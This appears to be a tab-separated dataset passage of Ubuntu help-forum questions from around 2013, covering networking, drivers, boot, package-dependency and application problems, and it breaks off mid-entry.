387725	dhcp renewing every 1 second in 13.10	i 've upgraded to ubuntu 13.10 by doing a brand new fresh install then update and noticed that in /var/log/syslog i 'm continually getting messages like : dec 8 02:44:15 running-shoe dhclient : dhcprequest of 81.xxx.xxx.38 on wlan0 to 81.xxx.xxx.33 port 67 dec 8 02:44:15 running-shoe dhclient : dhcpack of 81.xxx.xxx.38 from 81.xxx.xxx.33 dec 8 02:44:15 running-shoe dhclient : bound to 81.xxx.xxx.38 -- renewal in 1 seconds . dec 8 02:44:15 running-shoe networkmanager [ 754 ] : < info > ( wlan0 ) : dhcpv4 state changed renew - > renew dec 8 02:44:15 running-shoe networkmanager [ 754 ] : < info > address 81.xxx.xxx.38 dec 8 02:44:15 running-shoe networkmanager [ 754 ] : < info > prefix 27 ( 255.255.255.224 ) dec 8 02:44:15 running-shoe networkmanager [ 754 ] : < info > gateway 81.xxx.xxx.33 dec 8 02:44:15 running-shoe networkmanager [ 754 ] : < info > nameserver '81.xxx.xxx.33' dec 8 02:44:15 running-shoe networkmanager [ 754 ] : < info > nameserver '217.xxx.xxx.20' dec 8 02:44:15 running-shoe networkmanager [ 754 ] : < info > nameserver '217.xxx.xxx.21' dec 8 02:44:15 running-shoe networkmanager [ 754 ] : < info > domain name 'lan' dec 8 02:44:16 running-shoe dhclient : dhcprequest of 81.xxx.xxx.38 on wlan0 to 81.xxx.xxx.33 port 67 dec 8 02:44:16 running-shoe dhclient : dhcpack of 81.xxx.xxx.38 from 81.xxx.xxx.33 dec 8 02:44:16 running-shoe dhclient : bound to 81.xxx.xxx.38 -- renewal in 1 seconds . dec 8 02:44:16 running-shoe networkmanager [ 754 ] : < info > ( wlan0 ) : dhcpv4 state changed renew - > renew it is working ok , in that i get wifi access , but it is weird that it is renewing the dhcp every single second . i get the feeling that this might be detrimental to the network . the router at 81.xxx.xxx.33 is a technicalor gateway tg582n connected by pppoe . and everything seems to be working except for the continual renewal . the device is a dell laptop . any suggestions on how to stop it renewing every single second ? i 've not changed any network settings from the fresh install . -j
387728	no sound after updating the software in dell latitude e6320 . originally installed ubuntu 12.10 64 bit	i have installed ubuntu 12.10 in my dell latitude e6320.initially it worked well without issues . when i updated the software , there is no sound . even the website display is getting wide . please let me know how to fix the issue ? i dont want to reinstall ubuntu again as i have already set up lot of things here . please help . thanks
387729	tons of problem , fill_in_dev failed , black screen	i 'm new to this ( linux world ) my friends recommended me to install ubuntu to start because it is basic and popular . lol . i have this problem ; disabling irq # 10 disabling irq # 10 10 years later.. [ drm : drm_pci_agp_init ] error . can not initialize the agpgart module . drm : fill_in_dev failed . then black screen . packard bell easynote ts11hr intel core i5-2410m 4gb ddr3 nvidia gt520m 512mb ram hdd 640gb but i have windows too ubuntu version 13.10 ( 12.04 kernel panic error , mount root btw , another story ) i install this so with noapi , nolapi , acpi=off and nomodereset , because it was the only way . black screen when select live and install , bootable options . i try added those parameters in sudo nano etc/default/grub , but no results . can anyone help me ? or tell how can uninstall without affecting windows . sorry for bad english , i speak spanish .
387730	upon installing ubuntu 13.10 , “acpid : exiting”	i 'm unable to install ubuntu 13.10 . in this answer they talk about partitioning . please find the screenshot of my partitioning : please help me understand what i need to do ? update : please find below the gparted screenshot : update : when i follow avinash raj instructions i get stuck on step `` right click on the unallocated ... '' . below is the screenshot :
387733	not able to add yahoo account to thunderbird mail	i am not able to add my yahoo mail account to thunderbird mail , it shows errors like thunderbird failed to find settings for your mail..i donât know how to proceed further
387740	how can ı change xterm to terminal window	hi ı am using codeblocks ide when ı build a program ıt runs on xterm but xterm window is so small , letters cant be read how can ı make my code run on my terminal
387743	mail from command missing	i am trying to send mail from evolution and get this message : mail from command failed : no identity changes permitted . lc1sm14589093qeb.5 - gsmtp any clues what is wrong ?
387744	upgraded ubuntu and now just wallpaper is appearing & nothing else	good evening , my computer took a few hours but appeared to do the upgrade to what i believe is 13.+ . when i was requested to reboot the computer , it did so without fail . when it booted into the screen , all that appeared was the wallpaper i had previously . no other icons at all . the mouse moves fine and i pressed my calculator button on the keyboard and that came up . my first thought is that all my icons may be off of the screen , but i do n't know how to get that back either . i am very novice and appreciate any assistance . best , sam
387747	hd videos on youtube play choppy	any time i play a video in 720p and 1080p on you-tube it becomes choppy and pixelated . also in full screen any type of you-tube video does the same thing . i’ve updated my graphics driver and had no luck , i am thinking maybe its a flash problem , but i am new to ubuntu . i’m running 12.04 fresh install and mozilla firefox .
387749	access windows 8 partition via virtualbox	i have an asus k55a laptop which is currently dual booting windows 8 and ubuntu 13.10 . i 'm trying to access my windows 8 partition without restarting , with virtualbox . to clarify : windows 8 installed the partition that has win8 installed `` os '' is mounted under /dev/sda3 ubuntu is installed and currently running i want to be able to use my windows 8 partition through virtualbox let me know if what i want to do is possible . thanks !
387751	what is quirk and how to use it ?	i am trying to follow the instruction here on using quirk to fix the closing lid problem with intel graphics . however , the instruction is very unclear . i do not understand : 1 ) where to put the xorg.conf file ? 2 ) the snippet posted in the force-pipe-a quirk is n't the full code , is it ? i tried to use it to implement the sample code in the beginning , but i 'm not sure how to modify the device name , the package name , etc . to fit my case . i 'm using a thinkpad x201i , intel graphics .
387753	django importerror	how do i fix this error ? it has been driving me crazy ( it happens when i run models.py ) : traceback ( most recent call last ) : file `` models.py '' , line 1 , in < module > from django.db import models file `` /usr/lib/python2.7/dist-packages/django/db/__init__.py '' , line 14 , in < module > if not settings.databases : file `` /usr/lib/python2.7/dist-packages/django/utils/functional.py '' , line 276 , in __getattr__ self._setup ( ) file `` /usr/lib/python2.7/dist-packages/django/conf/__init__.py '' , line 40 , in _setup raise importerror ( `` settings can not be imported , because environment variable % s is undefined . '' % environment_variable ) importerror : settings can not be imported , because environment variable django_settings_module is undefined .
387755	is it just me or is xubuntu really really unstable ?	so , i 'm trying to get a mining rig working using xubuntu . i 've been at this all day , like 14 hours and i ca n't get xubuntu to be stable at all using version 13.10 . i tried both just running from a live usb and actually installing it to a usb . ( 16 gb usb ) i get a lot of random shut downs when trying to install a program or upgrade a driver , freezing with no way to unfreeze it , when i boot sometimes it just wo n't load , sometimes the screen just turns into a while screen with differently colored spots all over it , among other problems . the real reason i 'm asking this question is because i decided to try ubuntu on this same system to see if it was just xubuntu and it appears like it is , i 'm not having any problems on ubuntu , whereas i have a whole ton of different problems on xubuntu . the hardware is : motherboard : crosshair v formula-z graphics card : amd r9 280x ( i have 4 of them , but i only have one connected right now until i can get things working ) cpu : amd athlon ii x3 455 ram : i have a single 4gb stick of corsair vengeance ram , do n't have a link or a model number . i can just use ubuntu for my mining os but everyone seems to recommend xubuntu because it 's faster . any recommendations on how i can fix it or even any speculations on what is causing the problems ? update : i think the problem might be tied to my graphics card and the drivers . ubuntu was just working fine until i updated the drivers for my graphics card and now it freezes all the time . i 've tried updating the drivers a few different ways . i 've tried using the ones straight from the amd website and fglrx ( ? ) ones built into linux as proprietary drivers , neither of them work . update 2 : another thing worth noting is that my motherboard only boots about half the time . i get a variety of different error messages and the motherboard never reaches post . the other half of the time it boots normally .
387757	how to make `sudo` command password to visible ?	is it possible to make root password visible as asterisk ( or any other character ) on using sudo command ? ? currently , it does not display anything on monitor , thus making it difficult to count the number of keystrokes pressed..
387758	how to make linux- { image , header } -3.11.x satisfy linux-generic dependencies ?	what is the difference from apt 's perspective between ubuntu 12.04 lts ( precise ) kernel packages : linux-image-3.2.0-57-generic linux-image-3.11.0-14-generic such that the former satisfies meta-package linux-generic , but the latter is not selected for upgrade ? is the dependency hardcoded by version ? can the depends metadata be specified at apt install-time ? on certain hardware that works well with 3.11 , i would like to use linux-image-3.11.0-14-generic and its successors as the default 12.04 kernel , selected for updates by apt-get dist-upgrade . after testing , i hope to purge linux-image-3.2.0-57-generic and not be prompted to install its 3.2.x successors . i hope to better understand the workings of the kernel meta packages . it seems there is a 'slotting ' mechanism at work here , but i do n't know where that slot designation metadata lives . is that metadata permanent for a given set of .deb files , or if it is changeable with a special invocation of apt tools ( apt-get , dpkg , etc . ) when installing ? my systems carry these kernels currently : $ sudo aptitude search 'linux- ' |grep -e ^i |grep -v libc i linux-firmware - firmware for linux kernel drivers i linux-generic - complete generic linux kernel i a linux-headers-3.2.0-57 - header files related to linux kernel versi i a linux-headers-3.2.0-57-generic - linux kernel headers for version 3.2.0 on i linux-headers-generic - generic linux kernel headers i linux-image-3.11.0-14-generic - linux kernel image for version 3.11.0 on 6 i linux-image-3.2.0-57-generic - linux kernel image for version 3.2.0 on 64 i linux-image-generic - generic linux kernel image and the following kernel headers are available : $ sudo aptitude search linux-headers |grep '3.11' p linux-headers-3.11.0-13 - header files related to linux kernel versi p linux-headers-3.11.0-13-generic - linux kernel headers for version 3.11.0 on p linux-headers-3.11.0-13-generic - linux kernel headers for version 3.11.0 on p linux-headers-3.11.0-14 - header files related to linux kernel versi p linux-headers-3.11.0-14-generic - linux kernel headers for version 3.11.0 on p linux-headers-3.11.0-14-generic - linux kernel headers for version 3.11.0 on i can see from the installed metapackage linux-generic that the 3.2.0.x kernel and header are selected . does that mean the .deb carries a hardcoded version , and only new packages can set new dependencies ? $ sudo aptitude show linux-generic package : linux-generic state : installed automatically installed : no version : 3.2.0.57.68 priority : optional section : kernel maintainer : ubuntu kernel team < kernel-team @ lists.ubuntu.com > architecture : amd64 uncompressed size : 32.8 k depends : linux-image-generic ( = 3.2.0.57.68 ) , linux-headers-generic ( = 3.2.0.57.68 ) conflicts : linux-generic description : complete generic linux kernel this package will always depend on the latest complete generic linux kernel available . the linux-image-generic package which fulfils the dependency requirement : $ sudo aptitude show linux-image-generic package : linux-image-generic state : installed automatically installed : no version : 3.2.0.57.68 priority : optional section : kernel maintainer : ubuntu kernel team < kernel-team @ lists.ubuntu.com > architecture : amd64 uncompressed size : 32.8 k depends : linux-image-3.2.0-57-generic , linux-firmware conflicts : linux-image-generic description : generic linux kernel image this package will always depend on the latest generic kernel image available . and the manually-installed package that does seem to meet the same dependency requirement : $ sudo aptitude show linux-image-3.11.0-14-generic package : linux-image-3.11.0-14-generic new : yes state : installed automatically installed : no version : 3.11.0-14.21~precise1 priority : optional section : kernel maintainer : ubuntu kernel team < kernel-team @ lists.ubuntu.com > architecture : amd64 uncompressed size : 201 m depends : initramfs-tools ( > = 0.36ubuntu6 ) , module-init-tools ( > = 3.3-pre11-4ubuntu3 ) predepends : dpkg ( > = 1.10.24 ) recommends : grub-pc | grub-efi-amd64 | grub-efi-ia32 | grub | lilo ( > = 19.1 ) suggests : fdutils , linux-lts-saucy-doc-3.11.0 | linux-lts-saucy-source-3.11.0 , linux-lts-saucy-tools , linux-headers-3.11.0-14-generic conflicts : hotplug ( < 0.0.20040105-1 ) , hotplug ( < 0.0.20040105-1 ) , linux-image-3.11.0-14-generic provides : fuse-module , linux-image , linux-image-3.0 description : linux kernel image for version 3.11.0 on 64 bit x86 smp this package contains the linux kernel image for version 3.11.0 on 64 bit x86 smp . also includes the corresponding system.map file , the modules built by the packager , and scripts that try to ensure that the system is not left in an unbootable state after an update . supports generic processors . geared toward desktop and server systems . you likely do not want to install this package directly . instead , install the linux-generic meta-package , which will ensure that upgrades work correctly , and that supporting packages are also installed . i have the same question regarding linux-headers . the 3.11 linux-headers arent selected for upgrade , i have to manually install the package . after doing this once , can it be made the default for upgrades ?
387760	wired lan and localhost setup in school	in my school all 6 pcs ( ubuntu 10.04 desktop + lamp + lan card ) + 5 ncomputing client in single room lab with one router . pc-1 ubuntu 10.04 32bit act as desktop + server + ncomputing x-series x550 1kit ref : http : //www.ncomputing.com/products/xseries image : http : //www.ncomputing.com/files/images/diagrams/products_x550_6users-sm.jpg pc-2 ubuntu 10.04 32bit pc-3 ubuntu 10.04 32bit pc-4 ubuntu 10.04 32bit pc-5 ubuntu 10.04 32bit pc-6 ubuntu 10.04 64bit pc-7 ncomputing client ( no cpu ) pc-8 ncomputing client ( no cpu ) pc-9 ncomputing client ( no cpu ) pc-10 ncomputing client ( no cpu ) pc-11 ncomputing client ( no cpu ) query.1 i want to setup wired lan with static ip [ start from pc-1 ] . query.2 i want to setup lamp server [ pc-1 as server ] with domain schoolname . query.3 all other pc [ users ] can access shared files , shared folders and http : // schoolname / from pc-1 . query.4 all pc [ users ] can access shared internet using 3g datacard on pc-1 . thanks .
387761	show current running process with other name	if i did top or htop then it will display current running process . i want to display the process names by with some other names and not with original name . for example even firefox running i want display in top as icefox or waterfox in top or htop .like that how can i do in ubuntu ? thank you .
387766	ca n't install vmware-view-client from partner repo in saucy	i 'm having trouble installing a vmware-view-client from the partner repo . i think i 've troubleshooted it down to needing to install libudev0 , but only libudev1 is available . i was wondering if anyone could think of a workaround to get libudev0 installed . thanks .
387767	how do i install python-virtualenv on ubuntu server 12.04 ?	when ever i try to sudo apt-get install python-virtualenv , i 'm told that ubuntu is unable to locate the package . i 'm running the server in a virtualbox . it has networking and can access the web via nat , so that 's not an issue . aptitude can see the normal python module , but just not this particular bit that i need . so does anyone have a way , direct or roundabout , for me to resolve this ?
387768	issues installing amd64 patch	allen @ gespenst : ~ $ cd /tmp allen @ gespenst : /tmp $ tar xf /home/allen/desktop/amd64-microcode_1.20120910-3.debian.tar.gz allen @ gespenst : /tmp $ mkdir -p /lib/firmware/amd-ucode mkdir : can not create directory `/lib/firmware/amd-ucode ' : permission denied allen @ gespenst : /tmp $ does this permission denied have to do with my etc/fstab/ settings or something ? if so how do i modify it so it can be set to default instead of users ?
387769	keyboard problem hp dm4-2015dx	my keyboard does not works - than i try to put the question here but it 's not possible because it do n't meet there standard ! - my keyboard don '' t work ! - i did not make this problem , now i had to find a other computer to put this question here ! does anyone knows what to do , it 's a hp laptop dm4-2015dx
387770	how to install ubuntu along side with windows 8 in the legacy mode on a acer v5 laptop	earlier i have tried to install ubuntu along side with a pre installed windows 8 under uefi mode , but after repairing the boots i lost both the windows 8 and ubuntu , now i uninstall pre installed windows and set the uefi and legacy and managed to install windows . is there a special way to install ubuntu on this way enabling dual boot without much configurations ? thank you in advance
387775	forgot my password in this new install of ubuntu 12.04	i installed 10.04 and then did the upgrade to 12.04 lts . when it had finished and all was installed i changed the username and the password to my duaghters name and put inher password . but i have now forgotten both the old and new password and cant get into the system to install programs , files ect . i deleted all the info in the keyring and restarted the laptop but it did n't work . also canot get the grub loader up so i could n't reset that way . is there anyway to reste the passwords short of re installing another version of ubuntu desktop ? help ! it too me 5 hours to install this copy .
387776	ubuntu 13.10 tty wont open	i 'm new to ubuntu and linux in general . i am trying to open a tty screen , but when i press ctrl+alt+f1-f6 , the only thing that happens is the mouse cursor disappears , nothing else no black screen . if i press ctrl+alt+f7 , i get the cursor back . i am using ubuntu 13.10 . any help would be appreciated .
387778	how to create backup domain controller ( when pdc does n't have ldap ) ?	after searching & reading tutorials i understand that ldap should be installed & configured on pdc to create a bdc . as i created pdc with samba without ldap . my question is are.. 1 ) . is it safe to configure ldap on my running pdc so that i can create bdc ? 2 ) . is there any other option to create bdc without doing anything on my pdc ? thanks in advance .
387779	locked out of ubuntu 12.04 lts and my computer !	i have been trying unsuccessfully to switch from ubuntu 12.04 lts on my pavilion a600n machine back to vista , and i was positive i had it installed to run parallel with windows . now i find my password does n't let me log into ubuntu , and no matter what i do , i can not get back to vista either . in essence , i have a paperweight ; no backup/ restore disk for windows , and ubuntu that ca n't access the internet because the wireless connection i have does n't understand linux ( i have to buy a new one , i figured that out already ) . all i really need to be able to do is be able to select which os at start-up and reset my ( admin ) password from the log-in screen so i can get into ubuntu . any and all help would be greatly appreciated !
387780	ca n't change brcm_monitor0 in /proc	i am trying to change the value in the file /proc/brcm_monitor0 from 0 to 1 . this file is used to set broadcom wifi modules into monitor mode . the default method to do this is : sudo -s echo 1 > /proc/brcm_monitor0 but , this gives the error : -bash : echo : write error : input/output error so i try the second method : echo 1 | sudo tee /proc/brcm_monitor0 the console outputs 1 , but when i check the file with : cat brcm_monitor0 it 's still 0 . i have no clue why the file wo n't change . i 've tried chmod 777 , but that did not seem to change anything in the output . i know that the proc folder contains virtual files , but from what i 've read , the above two methods should work in changing parameters stored in the files . any suggestions are welcome . thanks
387781	how to fix ubuntu 12.04 boot to ( initramfs ) in windows ?	the usual story . brand new 12.04 installation , dual boot on samsung series 9 laptop . previously had this setup working fine for more than a year . unexpected reboot , and linux hangs at the purple screen before the dots . boot in recovery mode and it falls through to initramfs boot screen , where basic commands like sudo and fdisk do n't work . complication : solid state harddrive , no optical drive , and i 've never managed to boot it from a usb stick - bios seems to never recognise a usb stick as a valid boot option . possible redemption : i have full access to the ubuntu partition through windows and could manually fix the relevant files , if i knew what to look for . during recovery mode boot , i get lots of stuff like [ 4.004179 ] loop : write error at byte offset 20619154432 , length 1024 . [ 4.795865 ] jbd : recovery failed [ 4.795911 ext3-fs ( loop0 ) : error loading journal mount : mounting /dev/loop0 on /root failed : invalid argument begin : running /scripts/local-bottom ... done . done . begin : running /scripts/init-bottom ... mount : mounting /dev on /root/dev failed : no such file or directory done . mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _
387784	wine sound problems with games	can anyone help me ? alright , i 'm getting really upset with this . i love ubuntu ( and linux in general ) and i 've never had this issue in my life , but now that it 's happening , i 'm thinking of starting to use windows again . my issue : whenever i start an game under wine ( wine windows program loader ) that uses directx , the sound is really weird . to describe it , i would say it 's slowed down and skippy . i 've tried multiple games that used to run fine , such as bit trip runner 2 and limbo . solutions i 've tried . i 've tried uninstalling and reinstalling the games , but that did n't work . i tried completely deleting the wine prefix , reinstalling wine , and then reinstalling the game , but that did n't work . i tried deleting the wine prefix and use the terminal to make a new 32-bit prefix , rather than the default 64-bit prefix ( yes , i 'm on a 64-bit prefix ) , and then reinstalling the game , but that did n't work . a slight fix : after trying the winenopulse=1 trick someone told me about , and the audio changes from being slowed down and skippy to barely understandable from sounding speed up and full of static . i decided to try and put up with it for a while and lo and behold , after around 2 minutes of playing the sound started working fine . this was good and all but i would really like it to sound correct all the time . additional details : wine version : i 'm using the latest version of wine , although all the wine versions are doing the same thing for me . specs : pc : hp compaq pro 6305 64-bit with efi firmware os : ubuntu 13.10 64-bit
387791	ubuntu 13.10 - incomplete desktop	i have had a single ubuntu virtual machine that i have upgrade over the years . it literally has nothing on it except a couple files . i recently decide to upgrade it from i believe 13.04 but i could be mistaken . a picture is worth a thousand words . how do i reinstall launchpad ( is that what its called ) so regain some sort of control over my virtual machine ? i was forced to uninstall nvidia 's drivers because it was booting and my mouse was a x icon . before i `` installed '' 13.10 the virtual machine was working . i have pressed the `` windows key '' and it does nothing . the host machine is windows x64 . the virtual machine itself is a vmware virtual machine . if somebody has a better name for the title of this question i am open to suggestions . update : in an attempt to `` reset '' unity i was able to determine that compiz ( no idea what this is ) was unable to find the opengl plugin
387792	unable to mount external hard disk	my hard disk suddenly appears to be inaccessible , with the following error : unable to mount external hd error mounting : mount exited with exit code 13 : $ mft must be non-resident . failed to load $ mft : input/output error failed to mount '/dev/sdc1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . the information inside the hd is valuable for me , any help please ?
387799	ca n't enable google music plugin on rhythmbox 3.00 ubuntu 13.10 - python error	i am having a problem enabling the gmusic plugin on rythmbox 3.00 in ubuntu 13.10 , it worked in rythmbox 2.9 but now it stopped working , tryed with ppa and pip installations and both fail . i installed the plugin through the apt procedure : 598 sudo add-apt-repository ppa : nvbn-rm/ppa 599 sudo apt-get update 600 sudo apt-get install rhythmbox-gmusic then tried the pip procedure : 621 sudo apt-get install python-pip git-core 622 sudo pip install gmusicapi 623 sudo pip install git+https : //github.com/nvbn/rhythmbox-gmusic.git # egg=rhythmbox-gmusic at last , i used the -- upgrade pip option : 639 sudo pip install gmusicapi -- upgrade 642 sudo pip install git+https : //github.com/nvbn/rhythmbox-gmusic.git # egg=rhythmbox-gmusic -- upgrade i am getting the following error , i think that it is related to the python version : ( rhythmbox:30192 ) : libpeas-warning ** : could not find loader 'python ' for plugin 'rhythmboxgmusic' this error is related to ca n't enable rhythmbox 's google music plugin but the workaround is not working on rhythmbox 3.0 * update : coverart is also affected , tryed to edit the plugin under /usr/lib/rhythmbox/plugins in order to specify the python version ( tried python , python2 , python2.7 , python3 and python3.3 ) without sucess . ( rhythmbox:5435 ) : libpeas-warning ** : could not find loader 'python ' for plugin 'coverart_search_providers' * update : i changed the plugin in order to specify python 3 i get a different log : unable to open ~/.mtpz-data for reading , mtpz disabled.importerror : no module named 'rhythmboxgmusic' ( rhythmbox:5798 ) : libpeas-warning ** : error loading plugin 'rhythmboxgmusic' * update : the content of the /usr/lib/rhythmbox/plugin/rhythmbox-gmusic folder is the following ( here is where i changed the python command ) : sivart @ thinkpad-t410i : /usr/lib/rhythmbox/plugins/googleplaymusic $ ls -lash total 12k 4.0k drwxr-xr-x 2 root root 4.0k dec 8 02:25 . 4.0k drwxr-xr-x 33 root root 4.0k dec 8 02:43 .. 4.0k -rw-r -- r -- 1 root root 264 dec 8 03:08 googleplaymusic.plugin the googleplaymusic.plugin file : [ plugin ] loader=python module=rhythmboxgmusic depends=rb iage=2 name=google play music plugin description=listen to music form goolge play authors=vladimir iakovlev < nvbn.rm @ gmail.com > copyright=copyright â© 2012 website=https : //github.com/nvbn/rhythmbox-gmusic/ * update : just changed it as suggested : [ plugin ] loader=python3 module=rhythmboxgmusic.plugin depends=rb iage=2 name=google play music plugin description=listen to music form goolge play authors=vladimir iakovlev < nvbn.rm @ gmail.com > copyright=copyright © 2012 website=https : //github.com/nvbn/rhythmbox-gmusic/ but now the error is different : sivart @ thinkpad-t410i : ~ $ rhythmbox ( rhythmbox:1590 ) : gtk-critical ** : gtk_css_provider_load_from_path : assertion 'path ! = null ' failed ( rhythmbox:1590 ) : glib-gobject-critical ** : custom constructor for class soupserver returned null ( which is invalid ) . unable to remove object from construction_objects list , so memory was probably just leaked . please use ginitable instead . rhythmbox : could not connect to socket rhythmbox : no such file or directory ( rhythmbox:1590 ) : grilo-warning ** : [ registry ] grl-registry.c:440 : could not open plugins ' info directory '/usr/lib/x86_64-linux-gnu/grilo-0.2 ' : error opening directory '/usr/lib/x86_64-linux-gnu/grilo-0.2 ' : no such file or directory ( rhythmbox:1590 ) : rhythmbox-warning ** : failed to load grilo plugins : all configured plugin paths are invalid ( rhythmbox:1590 ) : rhythmbox-warning ** : could not open device /dev/radio0 unable to open ~/.mtpz-data for reading , mtpz disabled.importerror : no module named 'rhythmboxgmusic' ( rhythmbox:1590 ) : libpeas-warning ** : error loading plugin 'rhythmboxgmusic.plugin' thanks ! sivart
387800	i am a beginner , i want to fix a bug which i encountered	i have been using ubuntu quite a long time now , but a not a full-time ubuntu user . i recently encountered an error while installing vlc media player in my ubuntu 12.04 lts system . i would like to fix that bug myself . and i would also help fixing other bugs . for the community . i would like to contribute to open source , especially ubuntu . i have a quite a good knowledge in c , c++ . please help/ guide me . error message : ( ubuntu software centre ) the following packages have unmet dependencies : libdbusmenu-qt2 : depends : libc6 ( > = 2.1.3 ) but 2.15-0ubuntu10 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libqt4-dbus ( > = 4:4.6.2 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtgui4 ( > = 4:4.7.0~beta2 ) but 4:4.6.2-0ubuntu5 is installed depends : libstdc++6 ( > = 4.1.1 ) but 4.6.3-1ubuntu5 is installed libmng1 : depends : libc6 ( > = 2.11 ) but 2.15-0ubuntu10 is installed depends : libjpeg62 but it is not installed depends : liblcms1 ( > = 1.15-1 ) but 1.19.dfsg-1ubuntu3 is installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed libqt4-declarative : depends : libqt4-network ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqt4-script ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqt4-sql ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.6.2-0ubuntu5 is installed libqt4-opengl : depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.6.2-0ubuntu5 is installed libqt4-svg : depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.4 ) but 4:4.6.2-0ubuntu5 is installed libqtgui4 : depends : libjpeg62 but it is not installed depends : libqtcore4 ( = 4:4.6.2-0ubuntu5 ) but 4:4.8.1-0ubuntu4.4 is installed libschroedinger-1.0-0 : depends : libc6 ( > = 2.4 ) but 2.15-0ubuntu10 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : liboil0.3 ( > = 0.3.16 ) but it is not installed libsdl-image1.2 : depends : libc6 ( > = 2.4 ) but 2.15-0ubuntu10 is installed depends : libjpeg62 but it is not installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed libunity-2d-private0 : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libqt4-dbus ( > = 4:4.6.1 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqt4-declarative ( > = 4:4.7.0~rc1 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqt4-network ( > = 4:4.5.3 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqt4-opengl ( > = 4:4.5.3 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.6.2-0ubuntu5 is installed depends : libxcomposite1 ( > = 1:0.3-1 ) but 1:0.4.3-2build1 is installed depends : libxfixes3 ( > = 1:5.0-4ubuntu4 ) but 1:5.0-4ubuntu4 is installed libva1 : depends : libc6 ( > = 2.4 ) but 2.15-0ubuntu10 is installed libvcdinfo0 : depends : libc6 ( > = 2.4 ) but 2.15-0ubuntu10 is installed depends : libcdio10 but it is not installed depends : libiso9660-7 but it is not installed qt-at-spi : depends : libc6 ( > = 2.1.3 ) but 2.15-0ubuntu10 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libqt4-dbus ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.6.2-0ubuntu5 is installed depends : libstdc++6 ( > = 4.1.1 ) but 4.6.3-1ubuntu5 is installed sni-qt : depends : libc6 ( > = 2.2 ) but 2.15-0ubuntu10 is installed depends : libdbusmenu-qt2 ( > = 0.3.5 ) but 0.9.2-0ubuntu1 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libqt4-dbus ( > = 4:4.6.1 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtcore4 ( > = 4:4.7.3-1ubuntu3~ ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtgui4 ( > = 4:4.7.3 ) but 4:4.6.2-0ubuntu5 is installed depends : libstdc++6 ( > = 4.1.1 ) but 4.6.3-1ubuntu5 is installed unity-2d-panel : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libqt4-dbus ( > = 4:4.5.3 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.6.2-0ubuntu5 is installed depends : libunity-2d-private0 ( = 5.14.0-0ubuntu1 ) but 5.14.0-0ubuntu1 is installed depends : libxcomposite1 ( > = 1:0.3-1 ) but 1:0.4.3-2build1 is installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build1 is installed depends : unity-2d-common ( = 5.14.0-0ubuntu1 ) but 5.14.0-0ubuntu1 is installed vlc : depends : vlc-nox ( = 1.0.6-1ubuntu1 ) but 1.0.6-1ubuntu1 is installed depends : libaa1 ( > = 1.4p5 ) but 1.4p5-39ubuntu1 is installed depends : libc6 ( > = 2.8 ) but 2.15-0ubuntu10 is installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libglib2.0-0 ( > = 2.12.0 ) but 2.32.1-0ubuntu2 is installed depends : libgtk2.0-0 ( > = 2.8.0 ) but 2.24.10-0ubuntu6 is installed depends : libnotify1 ( > = 0.4.5 ) but it is not installed depends : libnotify1-gtk2.10 but it is not installed depends : 